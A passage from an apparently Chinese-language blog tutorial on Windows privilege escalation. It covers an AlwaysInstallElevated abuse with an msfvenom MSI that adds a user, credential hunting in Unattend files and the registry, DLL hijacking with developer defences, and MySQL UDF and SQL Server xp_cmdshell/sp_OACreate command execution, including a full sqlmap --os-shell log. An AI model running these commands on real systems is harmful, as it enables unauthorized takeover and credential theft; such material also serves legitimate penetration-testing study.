[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer] “AlwaysInstallElevated”=dword:00000001</code></pre>

<p>使用reg query命令查询是否存在漏洞</p>
<pre><code class="hljs shell">reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevatedor
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated</code></pre>

<p>如果目标机不存在漏洞会输出以下：</p>
<pre><code class="hljs shell">C:\Users\Administrator&gt;reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Instal
ler /v AlwaysInstallElevated
错误: 系统找不到指定的注册表项或值。</code></pre>

<p>如果存在漏洞会输出以下</p>
<p><img src="C:\Users\haha\AppData\Roaming\Typora\typora-user-images\image-20201120125225703.png" srcset="/img/loading.gif" alt="image-20201120125225703"></p>
<p>使用msf生成msi文件进行提权</p>
<p><code>msfvenom -p windows/adduser USER=test000 PASSWORD=password123! -f msi -o rotten.msi</code></p>
<p>目标机执行</p>
<p><code>msiexec /quiet /qn /i C:\Users\Steve.INFERNO\Downloads\rotten.msi </code></p>
<p>​             /quiet :安装过程中禁止向用户发送消息 ; /qn : 不使用GUI ;   /i : 安装程序</p>
<p>成功：</p>
<p><img src="C:\Users\haha\AppData\Roaming\Typora\typora-user-images\image-20201120125306948.png" srcset="/img/loading.gif" alt="image-20201120125306948"></p>
<h3 id="6-Unattended-Installs"><a href="#6-Unattended-Installs" class="headerlink" title="6.Unattended Installs"></a>6.Unattended Installs</h3><p>自动安装允许程序在不需要管理员关注下自动安装。这种解决方案用于在拥有较多雇员和时间紧缺的较大 型组织中部署程序。如果管理员没有进行清理的话，那么会有一个名为Unattend的XML文件残存在系统上。 这个XML文件包含所有在安装程序过程中的配置，包括一些本地用户的配置，以及管理员账户。</p>
<p>全盘搜索Unattend文件是个好办法，它通常会在以下一个文件夹中：</p>
<pre><code class="hljs shell">C:\Windows\Panther\ 
C:\Windows\Panther\Unattend\ 
C:\Windows\System32\ 
C:\Windows\System32\sysprep\</code></pre>

<p>除了Unattend.xml文件外，还要留意系统中的sysprep.xml和sysprep.inf文件，这些文件中都会包含部署操作 系统时使用的凭据信息，这些信息可以帮助我们提权。可以使用以下命令查看</p>
<p><code>dir C:*vnc.ini /s /b /c</code></p>
<p>或者在名称中包含关键词的项目：</p>
<p><code>dir C:\ /s /b /c | findstr /sr *password*</code></p>
<p>或者可以在文件内容中搜索password之类的关键字：</p>
<p><code>findstr /si password *.txt | *.xml | *.ini</code></p>
<p>可以查询注册表，例如，字符串password：</p>
<p><code>reg query HKLM /f password /t REG_SZ /s reg query HKCU /f password /t REG_SZ /s</code></p>
<p>在这些文件中通常包含用户名和密码，密码使用base64编码，并且在最后会附加”Password”，所以真正的密 码需要去掉最后的”Password”。</p>
<p>msf模块（post/windows/gather/enum_unattend ）</p>
<h2 id="6-powerup"><a href="#6-powerup" class="headerlink" title="6.powerup"></a>6.powerup</h2><p>由于本地没有配置环境，以后再更吧</p>
<p><a target="_blank" rel="noopener" href="http://www.vuln.cn/6436">http://www.vuln.cn/6436</a></p>
<h2 id="7-dll相关操作"><a href="#7-dll相关操作" class="headerlink" title="7.dll相关操作"></a>7.dll相关操作</h2><h3 id="1-dll劫持"><a href="#1-dll劫持" class="headerlink" title="1.dll劫持"></a>1.dll劫持</h3><h4 id="1-dll劫持原理"><a href="#1-dll劫持原理" class="headerlink" title="1.dll劫持原理"></a>1.dll劫持原理</h4><h5 id="1-Windows-XP-SP2之前，Windows查找DLL的目录以及对应的顺序："><a href="#1-Windows-XP-SP2之前，Windows查找DLL的目录以及对应的顺序：" class="headerlink" title="1.Windows XP SP2之前，Windows查找DLL的目录以及对应的顺序："></a>1.Windows XP SP2之前，Windows查找DLL的目录以及对应的顺序：</h5><p>​        1.进程对应的应用程序所在目录；</p>
<p>​        2.当前目录（Current Directory）；</p>
<p>​        3.系统目录（通过 GetSystemDirectory 获取）；</p>
<p>​        4.16位系统目录；</p>
<p>​        5.Windows目录（通过 GetWindowsDirectory 获取）；</p>
<p>​        6.PATH环境变量中的各个目录；</p>
<p>例如：对于文件系统,如doc文档打开会被应用程序office打开，而office运行的时候会加载系统的一个dll文件，如果我们将用恶意的dll来替换系统的dll文件，就是将DLL和doc文档放在一起，运行的时候就会在当前目录中找到DLL，从而优先系统目录下的DLL而被执行。</p>
<h5 id="2-在winxdows-xp-sp2之后，Windows查找DLL的目录以及对应的顺序（SafeDllSearchMode-默认会被开启）："><a href="#2-在winxdows-xp-sp2之后，Windows查找DLL的目录以及对应的顺序（SafeDllSearchMode-默认会被开启）：" class="headerlink" title="2.在winxdows xp sp2之后，Windows查找DLL的目录以及对应的顺序（SafeDllSearchMode 默认会被开启）："></a>2.在winxdows xp sp2之后，Windows查找DLL的目录以及对应的顺序（SafeDllSearchMode 默认会被开启）：</h5><p>默认注册表为：<code>HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\SafeDllSearchMode</code>，其键值为1</p>
<p>​        1.进程对应的应用程序所在目录（可理解为程序安装目录比如C:ProgramFilesuTorrent）；</p>
<p>​        2.系统目录（即%windir%system32）；</p>
<p>​        3.16位系统目录（即%windir%system）；</p>
<p>​        4.Windows目录（即%windir%）；</p>
<p>​        5.当前目录（运行的某个文件所在目录，比如C:DocumentsandSettingsAdministratorDesktoptest）；</p>
<p>​        6.PATH环境变量中的各个目录；</p>
<h5 id="3-windows7以上"><a href="#3-windows7以上" class="headerlink" title="3 windows7以上"></a>3 windows7以上</h5><p>系统没有了SafeDllSearchMode 而采用KnownDLLs，那么凡是此项下的DLL文件就会被禁止从EXE自身所在的目录下调用，而只能从系统目录即SYSTEM32目录下调用，其注册表位置：</p>
<p><code>HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\KnownDLLs</code></p>
<p>那么最终Windows203以上以及win7以上操作系统通过“DLL路径搜索目录顺序”和“KnownDLLs注册表项”的机制来确定应用程序所要调用的DLL的路径，之后，应用程序就将DLL载入了自己的内存空间，执行相应的函数功能。</p>
<p>​            1.默认情况下，如果软件安装在c盘根目录，而不是c:\Program Files，那经过身份验证的用户具有该目录的写权限，另外，perl，python，ruby等软件通常都添加到path变量中。那攻击者可以在当前目录中编写恶意DLL，只要重新运行exe程序就会中招。</p>
<p>​            2.SafeDllSearchMode + KnownDLLs二者结合可用来防范dll劫持，但是如果调用”不常见”的dll，也就是并未出现在KnownDLLs的列表中，那么无论SafeDllSearchMode是否开启，dll搜索的第一顺序均为程序的当前目录，这里就存在一个DLL劫持漏洞（在程序同级目录下预先放置一个同名dll，在进程启动的过程中会优先加载，实现劫持。</p>
<h4 id="2-实例演示"><a href="#2-实例演示" class="headerlink" title="2.实例演示"></a>2.实例演示</h4><p>这里就不演示了，只是提供一个思路吧，后续会补发文章。</p>
<p>1.启动应用程序<br> 2.使用Process Explorer等类似软件查看该应用程序启动后加载的动态链接库。<br> 3.从该应用程序已经加载的DLL列表中，查找在上述“KnownDLLs注册表项”中不存在的DLL。<br> 4.编写第三步中获取到的DLL的劫持DLL（不考虑软件是否正常运行可以直接使用msf生成一个dll进行替换；反之可以使用<a target="_blank" rel="noopener" href="https://github.com/coca1ne/DLL_Hijacker">DLL_Hijacker.py</a>生成指定dll的cpp文件，再编译为dll文件，具体操作请查阅资料，这里不再提供了）。<br> 5.将编写好的劫持DLL放到该应用程序目录下，重新启动该应用程序，检测是否劫持成功。</p>
<h4 id="3-防范"><a href="#3-防范" class="headerlink" title="3.防范"></a>3.防范</h4><p>1、开发者需要注意的问题：</p>
<p>调用第三方DLL时，使用LoadLibrary API加载DLL时使用绝对路径，类似的情况还包括其他API如LoadLibraryEx, CreateProcess, ShellExecute等，将所有需要使用到的DLL放在应用程序所在的目录，不放到系统目录或者其他目录。</p>
<p>调用系统DLL时，使用绝对路径</p>
<p>程序启动时调用API SetDllDirectory(L”“)将当前目录从DLL加载顺序中移除</p>
<p>补充：</p>
<p>从Windows 7的KB2533623补丁开始，微软更新了三个解决DLL劫持问题的新API：SetDefaultDllDirectories，AddDllDirectory，RemoveDllDirectory这几个API配合使用，可以有效的规避DLL劫持问题</p>
<p>但是这些API只能在打了KB2533623补丁的Windows7和Server2008上使用</p>
<p>详情见：</p>
<p><a target="_blank" rel="noopener" href="https://support.microsoft.com/zh-cn/kb/2533623">https://support.microsoft.com/zh-cn/kb/2533623</a></p>
<p>2、用户需要注意的问题：</p>
<p>留意浏览器下载目录下是否有可疑dll，防止其劫持下载的安装程序</p>
<p>对于“不可信”的程序，建议使用Process Monitor或者Rattler检查是否存在DLL劫持漏洞</p>
<h3 id="2-dll注入"><a href="#2-dll注入" class="headerlink" title="2.dll注入"></a>2.dll注入</h3><p>后面和dll劫持均开一篇单独更吧，先看一下下面这篇文章</p>
<p><a target="_blank" rel="noopener" href="https://www.anquanke.com/post/id/86671">https://www.anquanke.com/post/id/86671</a></p>
<p>针对dll劫持和dll注入后续会专门写文章来阐述清楚，这里只是先做一个提示。</p>
<h2 id="8-数据库提权"><a href="#8-数据库提权" class="headerlink" title="8.数据库提权"></a>8.数据库提权</h2><h3 id="1-mysql提权"><a href="#1-mysql提权" class="headerlink" title="1.mysql提权"></a>1.mysql提权</h3><p>udf提权：udf，MySQL扩展接口，用户自定义函数；mysql会调用一些资源，会把当前账号转化为system权限</p>
<p>系统要求：win7以下</p>
<p>mysql：小于5.7，root权限、未开启安全模式(mysql安全模式默认关闭)</p>
<h4 id="1-sqlmap提权"><a href="#1-sqlmap提权" class="headerlink" title="1.sqlmap提权"></a>1.sqlmap提权</h4><p>经过测试，win7、2k3、2k8均可，且mysql5.7.26也可</p>
<p>mysql需要设置<code>grant all privileges on *.* to &#39;连接的账户名&#39;@&#39;%&#39; identified by &#39;密码&#39;;</code></p>
<p>如果只想某指定ip访问，可将%替换为指定ip  ,再重启服务即可</p>
<pre><code class="hljs shell">root@kali:~# sqlmap -d &quot;mysql://root:root@192.168.8.64:3306/mysql&quot; --os-shell
        ___
       __H__                                                                                   
 ___ ___[,]_____ ___ ___  &#123;1.4.11#stable&#125;                                                      
|_ -| . [.]     | .&#x27;| . |                                                                      
|___|_  [.]_|_|_|__,|  _|                                                                      
      |_|V...       |_|   http://sqlmap.org                                                    

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user&#x27;s responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 11:55:30 /2020-11-22/

[11:55:30] [CRITICAL] SQLAlchemy connection issue (&#x27;OperationalError: (MySQLdb._exceptions.OperationalError) (1045, &quot;Access denied for user &#x27;root&#x27;@&#x27;192.168.8.75&#x27; (using password: YES)&quot;)&#x27;)   

[*] ending @ 11:55:30 /2020-11-22/

root@kali:~# sqlmap -d &quot;mysql://root:root@192.168.8.64:3306/mysql&quot; --os-shell
        ___
       __H__                                                                                   
 ___ ___[)]_____ ___ ___  &#123;1.4.11#stable&#125;                                                      
|_ -| . [&#x27;]     | .&#x27;| . |                                                                      
|___|_  [(]_|_|_|__,|  _|                                                                      
      |_|V...       |_|   http://sqlmap.org                                                    

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user&#x27;s responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 12:05:59 /2020-11-22/

[12:06:16] [INFO] connection to MySQL server &#x27;192.168.8.64:3306&#x27; established
[12:06:16] [INFO] testing MySQL
[12:06:16] [INFO] confirming MySQL
[12:06:16] [INFO] the back-end DBMS is MySQL
[12:06:16] [WARNING] (remote) ProgrammingError: (MySQLdb._exceptions.ProgrammingError) not enough arguments for format string
[12:06:16] [WARNING] (remote) ProgrammingError: (MySQLdb._exceptions.ProgrammingError) not enough arguments for format string
[12:06:16] [WARNING] (remote) ProgrammingError: (MySQLdb._exceptions.ProgrammingError) not enough arguments for format string
[12:06:16] [WARNING] (remote) ProgrammingError: (MySQLdb._exceptions.ProgrammingError) not enough arguments for format string
[12:06:16] [WARNING] (remote) ProgrammingError: (MySQLdb._exceptions.ProgrammingError) not enough arguments for format string
back-end DBMS: MySQL &gt;= 5.0.0
[12:06:16] [INFO] fingerprinting the back-end DBMS operating system
[12:06:16] [INFO] the back-end DBMS operating system is Windows
[12:06:16] [WARNING] (remote) OperationalError: (MySQLdb._exceptions.OperationalError) (1051, &quot;Unknown table &#x27;sqlmapfile&#x27;&quot;)
[12:06:16] [WARNING] (remote) OperationalError: (MySQLdb._exceptions.OperationalError) (1051, &quot;Unknown table &#x27;sqlmapfilehex&#x27;&quot;)
[12:06:16] [INFO] testing if current user is DBA
[12:06:16] [INFO] fetching current user
what is the back-end database management system architecture?
[1] 32-bit (default)
[2] 64-bit
<span class="hljs-meta">&gt;</span><span class="bash"> 2</span>
[12:06:23] [INFO] checking if UDF &#x27;sys_exec&#x27; already exist
[12:06:23] [INFO] checking if UDF &#x27;sys_eval&#x27; already exist
[12:06:23] [INFO] detecting back-end DBMS version from its banner
[12:06:23] [INFO] retrieving MySQL plugin directory absolute path
[12:06:23] [WARNING] (remote) OperationalError: (MySQLdb._exceptions.OperationalError) (1051, &quot;Unknown table &#x27;sqlmapfile&#x27;&quot;)
[12:06:23] [WARNING] (remote) OperationalError: (MySQLdb._exceptions.OperationalError) (1290, &#x27;The MySQL server is running with the --secure-file-priv option so it cannot execute this statement&#x27;)                                                                                          
[12:06:23] [WARNING] it looks like the file has not been written (usually occurs if the DBMS process user has no write privileges in the destination path)
[12:06:23] [WARNING] (remote) OperationalError: (MySQLdb._exceptions.OperationalError) (1051, &quot;Unknown table &#x27;sqlmapfilehex&#x27;&quot;)
[12:06:23] [ERROR] there has been a problem uploading the shared library, it looks like the binary file has not been written on the database underlying file system
do you want to proceed anyway? Beware that the operating system takeover will fail [y/N] y
[12:06:27] [INFO] creating UDF &#x27;sys_exec&#x27; from the binary UDF file
[12:06:27] [WARNING] (remote) OperationalError: (MySQLdb._exceptions.OperationalError) (1305, &#x27;FUNCTION mysql.sys_exec does not exist&#x27;)                                                       
[12:06:27] [WARNING] (remote) OperationalError: (MySQLdb._exceptions.OperationalError) (1126, &quot;Can&#x27;t open shared library &#x27;libszcug.dll&#x27; (errno: 126 )&quot;)
[12:06:27] [INFO] creating UDF &#x27;sys_eval&#x27; from the binary UDF file
[12:06:27] [WARNING] (remote) OperationalError: (MySQLdb._exceptions.OperationalError) (1305, &#x27;FUNCTION mysql.sys_eval does not exist&#x27;)                                                       
[12:06:27] [WARNING] (remote) OperationalError: (MySQLdb._exceptions.OperationalError) (1126, &quot;Can&#x27;t open shared library &#x27;libszcug.dll&#x27; (errno: 126 )&quot;)
[12:06:27] [WARNING] (remote) OperationalError: (MySQLdb._exceptions.OperationalError) (1051, &quot;Unknown table &#x27;sqlmapoutput&#x27;&quot;)
[12:06:27] [INFO] going to use injected user-defined functions &#x27;sys_eval&#x27; and &#x27;sys_exec&#x27; for operating system command execution
[12:06:27] [INFO] calling Windows OS shell. To quit type &#x27;x&#x27; or &#x27;q&#x27; and press ENTER
<span class="hljs-meta">os-shell&gt;</span><span class="bash"> </span></code></pre>

<h4 id="2-手动提权-借助PHP大马"><a href="#2-手动提权-借助PHP大马" class="headerlink" title="2.手动提权(借助PHP大马)"></a>2.手动提权(借助PHP大马)</h4><p>这里就不贴图了，但要注意的是你能执行的功能是根据你上传的dll文件来的，你dll文件里面函数有啥功能你就能执行啥，另外需注意：</p>
<p>version(mysql)&gt;5.1：udf.dll文件需上传到lib\plugin下</p>
<p>version(mysql)&lt;5.1：udf.dll文件需上传到c:\windows\system32(win2003版本)</p>
<h3 id="2-SQL-server提权-1433"><a href="#2-SQL-server提权-1433" class="headerlink" title="2.SQL server提权:1433"></a>2.SQL server提权:1433</h3><p>根据存储过程sa权限来提权</p>
<h4 id="1-xp-cmdshell-sqlserver-内置的一个命令，-05之后的的需要手动开启"><a href="#1-xp-cmdshell-sqlserver-内置的一个命令，-05之后的的需要手动开启" class="headerlink" title="1.xp_cmdshell(sqlserver 内置的一个命令， 05之后的的需要手动开启)"></a>1.xp_cmdshell(sqlserver 内置的一个命令， 05之后的的需要手动开启)</h4><p>sql server 各版本对应的权限   2008：network权限；2005 system权限</p>
<p> 开启xp_cmdshell：</p>
<pre><code class="hljs mssql">EXEC sp_configure &#39;show advanced options&#39;，1;RECONFIGURE;EXEC sp_configure &#39;xp_cmdshell&#39;，1;RECONFIGURE;</code></pre>

<p>关闭xp_cmdshell：</p>
<pre><code class="hljs mssql">exec sp_configure &#39;show advanced options&#39;, 1; reconfigure;

exec sp_configure &#39;xp_cmdshell&#39;, 0;reconfigure;</code></pre>

<p>数据库执行：</p>
<pre><code class="hljs mssql">EXEC master..xp_cmdshell &#39;命令或者二进制文件&#39; ;</code></pre>



<h4 id="2-sp-OACreate，没有回显，需要到最后的语句中找文件"><a href="#2-sp-OACreate，没有回显，需要到最后的语句中找文件" class="headerlink" title="2.sp_OACreate，没有回显，需要到最后的语句中找文件"></a>2.sp_OACreate，没有回显，需要到最后的语句中找文件</h4><p> sp_oacreate是一个非常危险的存储过程可以删除、复制、移动文件还能配合sp_oamethod来写文件执行cmd，默认无回显</p>
<p>需要手动开启：</p>
<pre><code class="hljs mssql">EXEC sp_configure &#39;show advanced options &#39;，1;

ECONFIGURE WITH OVERRIDE;

EXEC sp_configure &#39;Ole Automation Procedures &#39;，1;

RECONFIGURE WITH OVERRIDE;

EXEC sp_configure &#39;show advanced options &#39;,0;</code></pre>

<p>执行：</p>
<pre><code class="hljs mssql">declare @shell int exec sp_oacreate &#39;wscript.shell&#39;，@shell output exec sp_oamethod @shell, &#39;run&#39; ,null, &#39;c: \windows\system32\cmd.exe &#x2F;c whoami &gt;C:\who.txt&#39;&#x2F;</code></pre>

<p>最后的回显在C:\who.txt中</p>
<h4 id="3-也没有回显"><a href="#3-也没有回显" class="headerlink" title="3.也没有回显"></a>3.也没有回显</h4><pre><code class="hljs mssql">declare @o int;

exec sp_oacreate &#39;Shell.Application&#39;, @o out;

exec sp_oamethod @o，&#39;ShellExecute &#39;,null，&#39;cmd.exe&quot; , &#39; cmd &#x2F;c net user &gt;c:\test.txt&#39; , &#39;c:\windows\system32&#39; &#39; &#39;;</code></pre>

<p>回显在c:\test.txt中</p>
<p>参考：<a target="_blank" rel="noopener" href="https://lengjibo.github.io/windows%E6%8F%90%E6%9D%83%E6%80%BB%E7%BB%93/">https://lengjibo.github.io/windows%E6%8F%90%E6%9D%83%E6%80%BB%E7%BB%93/</a></p>
<p><a target="_blank" rel="noopener" href="https://422926799.github.io/posts/34b370c6.html">https://422926799.github.io/posts/34b370c6.html</a></p>
<p><a target="_blank" rel="noopener" href="https://www.cnblogs.com/swyft/articles/5580342.html">https://www.cnblogs.com/swyft/articles/5580342.html</a></p>
<p><a target="_blank" rel="noopener" href="https://www.cnblogs.com/bmjoker/p/11031238.html">https://www.cnblogs.com/bmjoker/p/11031238.html</a></p>

            </div>
            <hr>
            <div>
              <div class="post-metas mb-3">
                
                  <div class="post-meta mr-3">
                    <i class="iconfont icon-category"></i>
                    
                      <a class="hover-with-bg" href="/categories/%E5%86%85%E7%BD%91%E5%AE%89%E5%85%A8/">内网安全</a>
                    
                  </div>
                
                
                  <div class="post-meta">
                    <i class="iconfont icon-tags"></i>
                    
                      <a class="hover-with-bg" href="/tags/msf%E6%8F%90%E6%9D%83/">msf提权</a>
                    
                      <a class="hover-with-bg" href="/tags/bypassuac/">bypassuac</a>
                    
                      <a class="hover-with-bg" href="/tags/%E6%BC%8F%E6%B4%9E%E6%8F%90%E6%9D%83-Windows-exploit-suggester%E3%80%81msf/">漏洞提权(Windows-exploit-suggester、msf)</a>
                    
                      <a class="hover-with-bg" href="/tags/%E5%91%BD%E4%BB%A4%E6%8F%90%E6%9D%83-at%E3%80%81sc/">命令提权(at、sc)</a>
                    
                      <a class="hover-with-bg" href="/tags/%E9%85%8D%E7%BD%AE%E9%94%99%E8%AF%AF%E5%AF%BC%E8%87%B4%E6%8F%90%E6%9D%83/">配置错误导致提权</a>
                    
                      <a class="hover-with-bg" href="/tags/powerup%E5%B7%A5%E5%85%B7%E6%8F%90%E6%9D%83/">powerup工具提权</a>
                    
                      <a class="hover-with-bg" href="/tags/dll%E5%8A%AB%E6%8C%81/">dll劫持</a>
                    
                      <a class="hover-with-bg" href="/tags/dll%E6%B3%A8%E5%85%A5/">dll注入</a>
                    
                      <a class="hover-with-bg" href="/tags/%E6%95%B0%E6%8D%AE%E5%BA%93%E6%8F%90%E6%9D%83-mysql%E3%80%81sql-server/">数据库提权(mysql、sql server)</a>
                    
                  </div>
                
              </div>
              
                <p class="note note-warning">转载请注明出处！</p>
              
              
                <div class="post-prevnext row">
                  <article class="post-prev col-6">
                    
                    
                      <a href="/2020/10/01/linux%E6%8F%90%E6%9D%83-%E6%99%AE%E9%80%9A%E7%94%A8%E6%88%B7-root/">
                        <i class="iconfont icon-arrowleft"></i>
                        <span class="hidden-mobile">linux提权(普通用户-root)</span>
                        <span class="visible-mobile">Previous</span>
                      </a>
                    
                  </article>
                  <article class="post-next col-6">
                    
                    
                      <a href="/2020/10/01/windows%E5%9F%BA%E7%A1%80/">
                        <span class="hidden-mobile">windows基础</span>
                        <span class="visible-mobile">Next</span>
                        <i class="iconfont icon-arrowright"></i>
                      </a>
                    
                  </article>
                </div>
              
            </div>

            
          </article>
        </div>
      </div>
    </div>
    
      <div class="d-none d-lg-block col-lg-2 toc-container" id="toc-ctn">
        <div id="toc">
  <p class="toc-header"><i class="iconfont icon-list"></i>&nbsp;TOC</p>
  <div id="tocbot"></div>
</div>

      </div>
    
  </div>
</div>

<!-- Custom -->


    
  </main>

  
    <a id="scroll-top-button" href="#" role="button">
      <i class="iconfont icon-arrowup" aria-hidden="true"></i>
    </a>
  

  
    <div class="modal fade" id="modalSearch" tabindex="-1" role="dialog" aria-labelledby="ModalLabel"
     aria-hidden="true">
  <div class="modal-dialog modal-dialog-scrollable modal-lg" role="document">
    <div class="modal-content">
      <div class="modal-header text-center">
        <h4 class="modal-title w-100 font-weight-bold">Search</h4>
        <button type="button" id="local-search-close" class="close" data-dismiss="modal" aria-label="Close">
          <span aria-hidden="true">&times;</span>
        </button>
      </div>
      <div class="modal-body mx-3">
        <div class="md-form mb-5">
          <input type="text" id="local-search-input" class="form-control validate">
          <label data-error="x" data-success="v"
                 for="local-search-input">keyword</label>
        </div>
        <div class="list-group" id="local-search-result"></div>
      </div>
    </div>
  </div>
</div>
  

  

  

  <footer class="mt-5">
  <div class="text-center py-3">
    <!-- <div>
      <a href="https://hexo.io" target="_blank" rel="nofollow noopener"><span>Hexo</span></a>
      <i class="iconfont icon-love"></i>
      <a href="https://github.com/fluid-dev/hexo-theme-fluid" target="_blank" rel="nofollow noopener">
        <span>Fluid</span></a>
    </div> -->
    

    

    
  </div>
</footer>

<!-- SCRIPTS -->
<script  src="https://cdn.staticfile.org/jquery/3.4.1/jquery.min.js" ></script>
<script  src="https://cdn.staticfile.org/twitter-bootstrap/4.4.1/js/bootstrap.min.js" ></script>
<script  src="/js/debouncer.js" ></script>
<script  src="/js/main.js" ></script>

<!-- Plugins -->


  
    <script  src="/js/lazyload.js" ></script>
  



  



  <script defer src="https://cdn.staticfile.org/clipboard.js/2.0.6/clipboard.min.js" ></script>
  <script  src="/js/clipboard-use.js" ></script>







  <script  src="https://cdn.staticfile.org/tocbot/4.11.1/tocbot.min.js" ></script>
  <script>
    $(document).ready(function () {
      var boardCtn = $('#board-ctn');
      var boardTop = boardCtn.offset().top;

      tocbot.init({
        tocSelector: '#tocbot',
        contentSelector: '#post-body',
        headingSelector: 'h1,h2,h3,h4,h5,h6',
        linkClass: 'tocbot-link',
        activeLinkClass: 'tocbot-active-link',
        listClass: 'tocbot-list',
        isCollapsedClass: 'tocbot-is-collapsed',
        collapsibleClass: 'tocbot-is-collapsible',
        collapseDepth: 0,
        scrollSmooth: true,
        headingsOffset: -boardTop
      });
      if ($('.toc-list-item').length > 0) {
        $('#toc').css('visibility', 'visible');
      }
    });
  </script>



  <script  src="https://cdn.staticfile.org/typed.js/2.0.11/typed.min.js" ></script>
  <script>
    var typed = new Typed('#subtitle', {
      strings: [
        '  ',
        "windows提权&nbsp;",
      ],
      cursorChar: "",
      typeSpeed: 100,
      loop: false,
    });
    typed.stop();
    $(document).ready(function () {
      $(".typed-cursor").addClass("h2");
      typed.start();
    });
  </script>



  <script  src="https://cdn.staticfile.org/anchor-js/4.2.2/anchor.min.js" ></script>
  <script>
    anchors.options = {
      placement: "right",
      visible: "hover",
      
    };
    var el = "h1,h2,h3,h4,h5,h6".split(",");
    var res = [];
    for (item of el) {
      res.push(".markdown-body > " + item)
    }
    anchors.add(res.join(", "))
  </script>



  <script  src="/js/local-search.js" ></script>
  <script>
    var path = "/local-search.xml";
    var inputArea = document.querySelector("#local-search-input");
    inputArea.onclick = function () {
      searchFunc(path, 'local-search-input', 'local-search-result');
      this.onclick = null
    }
  </script>



  <script  src="https://cdn.staticfile.org/fancybox/3.5.7/jquery.fancybox.min.js" ></script>
  <link  rel="stylesheet" href="https://cdn.staticfile.org/fancybox/3.5.7/jquery.fancybox.min.css" />

  <script>
    $('#post img:not(.no-zoom img, img[no-zoom]), img[zoom]').each(
      function () {
        var element = document.createElement('a');
        $(element).attr('data-fancybox', 'images');
        $(element).attr('href', $(this).attr('src'));
        $(this).wrap(element);
      }
    );
  </script>







  
  
    <script>
      !function (e, t, a) {
        function r() {
          for (var e = 0; e < s.length; e++) s[e].alpha <= 0 ? (t.body.removeChild(s[e].el), s.splice(e, 1)) : (s[e].y--, s[e].scale += .004, s[e].alpha -= .013, s[e].el.style.cssText = "left:" + s[e].x + "px;top:" + s[e].y + "px;opacity:" + s[e].alpha + ";transform:scale(" + s[e].scale + "," + s[e].scale + ") rotate(45deg);background:" + s[e].color + ";z-index:99999");
          requestAnimationFrame(r)
        }

        function n() {
          var t = "function" == typeof e.onclick && e.onclick;
          e.onclick = function (e) {
            t && t(), o(e)
          }
        }

        function o(e) {
          var a = t.createElement("div");
          a.className = "heart", s.push({
            el: a,
            x: e.clientX - 5,
            y: e.clientY - 5,
            scale: 1,
            alpha: 1,
            color: c()
          }), t.body.appendChild(a)
        }

        function i(e) {
          var a = t.createElement("style");
          a.type = "text/css";
          try {
            a.appendChild(t.createTextNode(e))
          } catch (t) {
            a.styleSheet.cssText = e
          }
          t.getElementsByTagName("head")[0].appendChild(a)
        }

        function c() {
          return "rgb(" + ~~(255 * Math.random()) + "," + ~~(255 * Math.random()) + "," + ~~(255 * Math.random()) + ")"
        }

        var s = [];
        e.requestAnimationFrame = e.requestAnimationFrame || e.webkitRequestAnimationFrame || e.mozRequestAnimationFrame || e.oRequestAnimationFrame || e.msRequestAnimationFrame || function (e) {
          setTimeout(e, 1e3 / 60)
        }, i(".heart{width: 10px;height: 10px;position: fixed;background: #f00;transform: rotate(45deg);-webkit-transform: rotate(45deg);-moz-transform: rotate(45deg);}.heart:after,.heart:before{content: '';width: inherit;height: inherit;background: inherit;border-radius: 50%;-webkit-border-radius: 50%;-moz-border-radius: 50%;position: fixed;}.heart:after{top: -5px;}.heart:before{left: -5px;}"), n(), r()
      }(window, document);
    </script>
  














</body>
</html>
